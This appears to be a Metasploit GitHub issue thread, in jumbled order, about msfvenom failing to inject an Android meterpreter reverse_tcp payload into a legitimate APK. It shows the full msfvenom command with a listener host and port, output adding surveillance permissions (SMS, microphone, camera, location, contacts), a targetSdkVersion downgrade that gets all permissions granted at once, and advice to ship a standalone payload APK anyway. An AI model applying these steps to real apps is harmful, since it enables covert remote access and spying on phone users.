Closed DenDeze closed 2 years ago
Decompiled with apktool, compiled again after changing the sdk version. After this step i signed the apk. Now the injection seems to work fine until:
Application.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Rebuilding /home/myhome/test.apk with meterpreter injection as /tmp/d20180523-3982-qp9uar/output.apk
Error: Unable to rebuild apk with apktool
I guess you just have to create an apk file from scratch with msfvenom instead of injecting into a legit one. At least do this until a fix is released. It may be suspicious but it will still work.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Two issues were reported. It is unclear what caused these issues. However, this issue is almost 4 years old.
Since then, apktool has had various updates including several bug fixes.
Metasploit's APK parsing was recently updated to provide more useful debug output in instances where (re)building APK files failed. If these issues reoccur, there should now be a more useful error message which can be used to diagnose the root cause.
Closing.
Steps to reproduce
How'd you do it?
Decompile legit blah.apk with apktool to ~/blah, changed targetSdkVersion: '26' to targetSdkVersion: '22' (trying to ask the user to give all permissions at once).
recompiled 'blah' folder back in to blah.apk blah.apk works on an android device with new targetsdkversion.
What should happen?
putting the payload inside the blahnew.apk fails
msfvenom -x ~/blah.apk -p android/meterpreter/reverse_tcp LHOST=192.1.1.1 LPORT=444 -o blahnew.apk
What happens instead?
No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload Error: undefined method `[]' for nil:NilClass
Metasploit version
Framework: 4.16.57-dev Console : 4.16.57-dev
I installed Metasploit with:
OS
4.15.0-kali3-amd64